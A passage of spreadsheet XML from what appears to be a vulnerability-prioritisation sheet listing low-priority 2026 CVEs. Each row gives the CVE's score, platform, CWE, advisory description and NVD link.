      </c>
    </row>
    <row r="1598">
      <c r="A1598" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1598" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77887</t>
        </is>
      </c>
      <c r="C1598" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="D1598" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1598" s="5" t="inlineStr"/>
      <c r="F1598" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1598" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1598" s="5" t="inlineStr"/>
      <c r="I1598" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1598" s="5" t="inlineStr"/>
      <c r="K1598" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1598" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M1598" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77887</t>
        </is>
      </c>
    </row>
    <row r="1599">
      <c r="A1599" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1599" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77891</t>
        </is>
      </c>
      <c r="C1599" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="D1599" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1599" s="5" t="inlineStr"/>
      <c r="F1599" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1599" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1599" s="5" t="inlineStr"/>
      <c r="I1599" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1599" s="5" t="inlineStr"/>
      <c r="K1599" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1599" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M1599" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77891</t>
        </is>
      </c>
    </row>
    <row r="1600">
      <c r="A1600" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1600" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83534</t>
        </is>
      </c>
      <c r="C1600" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="D1600" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1600" s="5" t="inlineStr"/>
      <c r="F1600" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1600" s="5" t="inlineStr">
        <is>
          <t>postgresql</t>
        </is>
      </c>
      <c r="H1600" s="5" t="inlineStr"/>
      <c r="I1600" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J1600" s="5" t="inlineStr"/>
      <c r="K1600" s="5" t="inlineStr">
        <is>
          <t>CWE-250</t>
        </is>
      </c>
      <c r="L1600" s="5" t="inlineStr">
        <is>
          <t>PostgreSQL Anonymizer contains a vulnerability in the anon.anonymize_database_parallel() function that allows the owner of a table to run arbitrary code with superuser privilege. The issue is fixed in PostgreSQL Anonymizer 3.2.0 and later versions</t>
        </is>
      </c>
      <c r="M1600" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83534</t>
        </is>
      </c>
    </row>
    <row r="1601">
      <c r="A1601" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1601" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-62718</t>
        </is>
      </c>
      <c r="C1601" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D1601" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1601" s="5" t="inlineStr"/>
      <c r="F1601" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="G1601" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H1601" s="5" t="inlineStr">
        <is>
          <t>axios:axios</t>
        </is>
      </c>
      <c r="I1601" s="5" t="inlineStr">
        <is>
          <t>2026-04-09</t>
        </is>
      </c>
      <c r="J1601" s="5" t="inlineStr"/>
      <c r="K1601" s="5" t="inlineStr">
        <is>
          <t>CWE-1289, CWE-441, CWE-918</t>
        </is>
      </c>
      <c r="L1601" s="5" t="inlineStr">
        <is>
          <t>Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.0 and 0.31.0, Axios does not correctly handle hostname normalization when checking NO_PROXY rules. Requests to loopback addresses like localhost. (with a trailing dot) or [::1] (IPv6 literal) skip NO_PROXY matching and go through the configured proxy. This goes against what developers expect and lets attackers force requests through a proxy, even if NO_PROXY is set up to protect loopback or internal services. This issue leads to the possibility of proxy bypass and SSRF vulnerabilities allowing attackers to reach sensitive loopback or internal services despite the configured protections. This vulnerability is fixed in 1.15.0 and 0.31.0.</t>
        </is>
      </c>
      <c r="M1601" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-62718</t>
        </is>
      </c>
    </row>
    <row r="1602">
      <c r="A1602" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1602" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-25552</t>
        </is>
      </c>
      <c r="C1602" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D1602" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1602" s="5" t="inlineStr"/>
      <c r="F1602" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1602" s="5" t="inlineStr">
        <is>
          <t>nginx</t>
        </is>
      </c>
      <c r="H1602" s="5" t="inlineStr"/>
      <c r="I1602" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J1602" s="5" t="inlineStr"/>
      <c r="K1602" s="5" t="inlineStr">
        <is>
          <t>CWE-348</t>
        </is>
      </c>
      <c r="L1602" s="5" t="inlineStr">
        <is>
          <t>Ghost CLI before 1.30.1 contains an IP spoofing vulnerability that allows unauthenticated remote attackers to bypass rate-limiting controls by manipulating the X-Forwarded-For header through a misconfigured Nginx configuration. Attackers can append attacker-controlled values to the header chain using the $proxy_add_x_forwarded_for directive to present an arbitrary IP address, circumventing Ghost's rate-limiting mechanisms on self-hosted instances.</t>
        </is>
      </c>
      <c r="M1602" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-25552</t>
        </is>
      </c>
    </row>
    <row r="1603">
      <c r="A1603" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1603" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-43980</t>
        </is>
      </c>
      <c r="C1603" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D1603" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1603" s="5" t="inlineStr"/>
      <c r="F1603" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1603" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1603" s="5" t="inlineStr"/>
      <c r="I1603" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J1603" s="5" t="inlineStr"/>
      <c r="K1603" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1603" s="5" t="inlineStr">
        <is>
          <t>Malla is a web analyzer for Meshtastic networks based on MQTT data. Prior to commit 4086e2b5f61615a813b70b25bc76095083552135, code names (long_name, short_name) received via MQTT are stored in SQLite without sanitization and rendered into the DOM without escaping. Any participant on a public Meshtastic MQTT broker can set a malicious node name that executes JavaScript in the browser of every Malla dashboard visitor. Commit 4086e2b5f61615a813b70b25bc76095083552135 fixes the issue.</t>
        </is>
      </c>
      <c r="M1603" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-43980</t>
        </is>
      </c>
    </row>
    <row r="1604">
      <c r="A1604" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1604" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50544</t>
        </is>
      </c>
      <c r="C1604" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D1604" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1604" s="5" t="inlineStr"/>
      <c r="F1604" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1604" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1604" s="5" t="inlineStr"/>
      <c r="I1604" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J1604" s="5" t="inlineStr"/>
      <c r="K1604" s="5" t="inlineStr">
        <is>
          <t>CWE-379, CWE-732</t>
        </is>
      </c>
      <c r="L1604" s="5" t="inlineStr">
        <is>
          <t>NortheBridge/luminalshine is a Sunshine-compatible game stream host for Moonlight. Prior to version 26.05.0-rc4, a latent gap exists on a default install, the file at `src/platform/windows/misc.cpp` lives at `C:\ProgramData\LuminalShine\config\apps.json` and is created by the `SYSTEM` service. Under Windows' default `C:\ProgramData` inheritance, that gives `BUILTIN\Users` only Read+Execute — not writable — so the canonical EoP doesn't actually trigger on a vanilla install. Version 26.05.0-rc4 contains a patch for the issue. As a workaround, use default condition DACLs for `ProgramData`.</t>
        </is>
      </c>
      <c r="M1604" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50544</t>
        </is>
      </c>
    </row>
    <row r="1605">
      <c r="A1605" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1605" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-5588</t>
        </is>
      </c>
      <c r="C1605" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D1605" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1605" s="5" t="inlineStr"/>
      <c r="F1605" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1605" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1605" s="5" t="inlineStr"/>
      <c r="I1605" s="5" t="inlineStr">
        <is>
          <t>2026-04-15</t>
        </is>
      </c>
      <c r="J1605" s="5" t="inlineStr"/>
      <c r="K1605" s="5" t="inlineStr">
        <is>
          <t>CWE-327, CWE-347</t>
        </is>
      </c>
      <c r="L1605" s="5" t="inlineStr">
        <is>
          <t>Use of a Broken or Risky Cryptographic Algorithm vulnerability in Legion of the Bouncy Castle Inc. BC-JAVA bcpkix on all (pkix modules), Legion of the Bouncy Castle Inc. BCPKIX-FIPS bcpkix on All (pkix modules), Legion of the Bouncy Castle Inc. BCPIX-LTS bcpkix on All (pkix modules).
 This vulnerability is associated with program files JcaContentVerifierProviderBuilder.Java, JcaContentVerfierProviderBuilder.Java.
This issue affects BC-JAVA: from 1.67 before 1.80.2, from 1.81 before 1.81.1, from 1.82 before 1.84; BCPKIX-FIPS: from 2.0.6 before 2.0.11, from 2.1.7 before 2.1.11; BCPIX-LTS: from 2.73.7 before 2.73.11.</t>
        </is>
      </c>
      <c r="M1605" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-5588</t>
        </is>
      </c>
    </row>
    <row r="1606">
      <c r="A1606" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1606" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61807</t>
        </is>
      </c>
      <c r="C1606" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D1606" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1606" s="5" t="inlineStr"/>
      <c r="F1606" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1606" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1606" s="5" t="inlineStr"/>
      <c r="I1606" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J1606" s="5" t="inlineStr"/>
      <c r="K1606" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1606" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT is an IT asset/license management system. Prior to 8.6.2, a stored manufacturer or supplier name passed as the table component $name becomes data-selected-count-id in resources/views/partials/bootstrap-table.blade.php. Client-side code reads the browser-decoded countId, uses it as a selector, concatenates countId.substring(1) into an HTML string, and passes the string to jQuery .after(). A crafted name can therefore execute JavaScript when an authenticated user views the manufacturer detail page or supplier detail page, potentially exposing data or actions available to that session. This issue is fixed in version 8.6.2.</t>
        </is>
      </c>
      <c r="M1606" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61807</t>
        </is>
      </c>
    </row>
    <row r="1607">
      <c r="A1607" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1607" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63335</t>
        </is>
      </c>
      <c r="C1607" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D1607" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1607" s="5" t="inlineStr"/>
      <c r="F1607" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1607" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1607" s="5" t="inlineStr"/>
      <c r="I1607" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J1607" s="5" t="inlineStr"/>
      <c r="K1607" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L1607" s="5" t="inlineStr">
        <is>
          <t>The RabbitMQ Java client library allows Java and JVM-based applications to connect to and interact with RabbitMQ nodes. Prior to 5.31.0, inbound AMQP command assembly in src/main/java/com/rabbitmq/client/impl/CommandAssembler.java processes a content-bearing method and header whose remainingBodyBytes value is smaller than a following AMQP.FRAME_BODY payload. CommandAssembler.consumeBodyFrame subtracts the peer-controlled payload length before validating that it fits, drives remainingBodyBytes negative, and throws a raw UnsupportedOperationException instead of MalformedFrameException. A malicious or compromised broker peer can send this malformed sequence on an open nonzero channel to terminate frame processing and close the client connection, causing denial of service for work using that connection. This issue is fixed in version 5.31.0.</t>
        </is>
      </c>
      <c r="M1607" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63335</t>
        </is>
      </c>
    </row>
    <row r="1608">
      <c r="A1608" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1608" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63642</t>
        </is>
      </c>
      <c r="C1608" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D1608" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1608" s="5" t="inlineStr"/>
      <c r="F1608" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1608" s="5" t="inlineStr">
        <is>
          <t>oracle</t>
        </is>
      </c>
      <c r="H1608" s="5" t="inlineStr"/>
      <c r="I1608" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J1608" s="5" t="inlineStr"/>
      <c r="K1608" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1608" s="5" t="inlineStr">
        <is>
          <t>MagicMirror² is an open source modular smart mirror platform. Prior to 2.37.0, checkArticleUrl in defaultmodules/newsfeed/node_helper.js accepts the CHECK_ARTICLE_URL notification through the unauthenticated Socket.IO namespace /newsfeed and performs fetch(url, { method: "HEAD" }) without validating the attacker-controlled URL. The helper returns ARTICLE_URL_STATUS containing the URL and framing result, providing a response and timing oracle that can identify internal hosts and ports and trigger side effects on services that react to HEAD requests. This issue is fixed in version 2.37.0.</t>
        </is>
      </c>
      <c r="M1608" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63642</t>
        </is>
      </c>
    </row>
    <row r="1609">
      <c r="A1609" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1609" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69243</t>
        </is>
      </c>
      <c r="C1609" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D1609" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1609" s="5" t="inlineStr"/>
      <c r="F1609" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1609" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1609" s="5" t="inlineStr"/>
      <c r="I1609" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J1609" s="5" t="inlineStr"/>
      <c r="K1609" s="5" t="inlineStr">
        <is>
          <t>CWE-444</t>
        </is>
      </c>
      <c r="L1609" s="5" t="inlineStr">
        <is>
          <t>AIOHTTP is an asynchronous HTTP client/server framework for asyncio and Python. Prior to 3.14.2, the HTTP parsers were vulnerable to a request smuggling attack relating to WebSocket upgrades. If using the server-side component, an attacker may be able to execute a request smuggling vulnerability using an edge case in the WebSocket upgrade procedure. A WebSocket upgrade request with a body could cause the parser to switch protocols before the complete request body was received, leaving trailing bytes to be handled as upgraded-protocol or pipelined data rather than normal HTTP body data. This issue is fixed in version 3.14.2.</t>
        </is>
      </c>
      <c r="M1609" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69243</t>
        </is>
      </c>
    </row>
    <row r="1610">
      <c r="A1610" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1610" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70597</t>
        </is>
      </c>
      <c r="C1610" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D1610" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1610" s="5" t="inlineStr"/>
      <c r="F1610" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1610" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1610" s="5" t="inlineStr"/>
      <c r="I1610" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J1610" s="5" t="inlineStr"/>
      <c r="K1610" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="L1610" s="5" t="inlineStr">
        <is>
          <t>Electron is a framework for writing cross-platform desktop applications using JavaScript, HTML and CSS. Prior to 39.8.8, 40.9.0, 41.2.1, and 42.0.0-beta.3, the check Electron uses on macOS to confirm it was launched by a same-signed parent process could be bypassed by a local process. Apps that enable fuse-based hardening restricting ELECTRON_RUN_AS_NODE and NODE_OPTIONS to same-signed parents rely on this check, and a local attacker could bypass it and run code inside the signed app, inheriting its TCC permissions and keychain access. This issue is fixed in 39.8.8, 40.9.0, 41.2.1, and 42.0.0-beta.3.</t>
        </is>
      </c>
      <c r="M1610" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70597</t>
        </is>
      </c>
    </row>
    <row r="1611">
      <c r="A1611" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1611" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73411</t>
        </is>
      </c>
      <c r="C1611" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D1611" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1611" s="5" t="inlineStr"/>
      <c r="F1611" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1611" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1611" s="5" t="inlineStr"/>
      <c r="I1611" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J1611" s="5" t="inlineStr"/>
      <c r="K1611" s="5" t="inlineStr">
        <is>
          <t>CWE-116, CWE-200</t>
        </is>
      </c>
      <c r="L1611" s="5" t="inlineStr">
        <is>
          <t>Shescape is a simple shell escape library for JavaScript. Prior to 2.1.14 and 3.0.1, getEscapeFunction in src/internal/unix/dash.js fails to escape ~ after : or = when applications use the escape or escapeAll APIs on Unix with shell set to dash, or with shell set to true when Dash is the default, and interpolate the result into an assignment prefixed to a command. An attacker who controls the input can supply a value such as :~ to disclose the home-directory path and may change the location on which the command operates. This issue is fixed in versions 2.1.14 and 3.0.1.</t>
        </is>
      </c>
      <c r="M1611" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73411</t>
        </is>
      </c>
    </row>
    <row r="1612">
      <c r="A1612" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1612" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73412</t>
        </is>
      </c>
      <c r="C1612" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D1612" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1612" s="5" t="inlineStr"/>
      <c r="F1612" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1612" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1612" s="5" t="inlineStr"/>
      <c r="I1612" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J1612" s="5" t="inlineStr"/>
      <c r="K1612" s="5" t="inlineStr">
        <is>
          <t>CWE-155, CWE-78</t>
        </is>
      </c>
      <c r="L1612" s="5" t="inlineStr">
        <is>
          <t>Shescape is a simple shell escape library for JavaScript. Prior to 2.1.14 and 3.0.1, this impacts users of Shescape on Unix systems that explicitly configure shell to Zsh, or true when the default shell is Zsh, using the escape and escapeAll. The Zsh options EXTENDED_GLOB and MAGIC_EQUAL_SUBST exacerbate the problem. In certain case, an attacker can leverage home directory expansion and extended glob syntax to obtain lists of files and directories on the system. Depending on what the command does, this may be used to leak more information. This issue is fixed in versions 2.1.14 and 3.0.1.</t>
        </is>
      </c>
      <c r="M1612" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73412</t>
        </is>
      </c>
    </row>
    <row r="1613">
      <c r="A1613" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1613" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81824</t>
        </is>
      </c>
      <c r="C1613" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D1613" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1613" s="5" t="inlineStr"/>
      <c r="F1613" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1613" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1613" s="5" t="inlineStr"/>
      <c r="I1613" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1613" s="5" t="inlineStr"/>
      <c r="K1613" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1613" s="5" t="inlineStr">
        <is>
          <t>The vulnerability, if exploited, could allow a miscreant to run arbitrary JavaScript code in a browser session of a PIMBoards user who was socially engineered to click on a malicious link.</t>
        </is>
      </c>
      <c r="M1613" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81824</t>
        </is>
      </c>
    </row>
    <row r="1614">
      <c r="A1614" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1614" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81994</t>
        </is>
      </c>
      <c r="C1614" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D1614" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1614" s="5" t="inlineStr"/>
      <c r="F1614" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1614" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1614" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I1614" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1614" s="5" t="inlineStr"/>
      <c r="K1614" s="5" t="inlineStr">
        <is>
          <t>CWE-1321</t>
        </is>
      </c>
      <c r="L1614" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by an Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution') vulnerability that could lead to arbitrary file system read. An attacker could exploit this vulnerability to access sensitive files and directories outside the intended access scope. Exploitation of this issue requires user interaction in that a victim must open a malicious file. Scope is changed.</t>
        </is>
      </c>
      <c r="M1614" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81994</t>
        </is>
      </c>
    </row>
    <row r="1615">
      <c r="A1615" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1615" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81997</t>
        </is>
      </c>
      <c r="C1615" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D1615" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1615" s="5" t="inlineStr"/>
      <c r="F1615" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1615" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1615" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I1615" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1615" s="5" t="inlineStr"/>
      <c r="K1615" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1615" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by an Incorrect Authorization vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to bypass security measures and gain unauthorized write access. Exploitation of this issue requires user interaction in that a victim must open a malicious file. Scope is changed.</t>
        </is>
      </c>
      <c r="M1615" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81997</t>
        </is>
      </c>
    </row>
    <row r="1616">
      <c r="A1616" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1616" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83610</t>
        </is>
      </c>
      <c r="C1616" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D1616" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1616" s="5" t="inlineStr"/>
      <c r="F1616" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1616" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1616" s="5" t="inlineStr"/>
      <c r="I1616" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J1616" s="5" t="inlineStr"/>
      <c r="K1616" s="5" t="inlineStr">
        <is>
          <t>CWE-116</t>
        </is>
      </c>
      <c r="L1616" s="5" t="inlineStr">
        <is>
          <t>xmldom is a pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module. Prior to @xmldom/xmldom versions 0.8.15 and 0.9.12, and in xmldom version 0.6.0 and earlier, Document.createEntityReference(name) accepts an invalid name and the ENTITY_REFERENCE_NODE serializer emits the resulting nodeName directly in &amp;name; form. Directly serializing the node or fragment with XMLSerializer.serializeToString() and requireWellFormed: true can therefore break the entity-reference boundary and produce attacker-controlled XML markup when reparsed. The parser does not ordinarily create these nodes, and element-child insertion is rejected, so exploitation requires an application to create and directly serialize an EntityReference. This issue is fixed in @xmldom/xmldom versions 0.8.15 and 0.9.12; no fixed version is available for xmldom.</t>
        </is>
      </c>
      <c r="M1616" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83610</t>
        </is>
      </c>
    </row>
    <row r="1617">
      <c r="A1617" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1617" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84942</t>
        </is>
      </c>
      <c r="C1617" s="5" t="n">
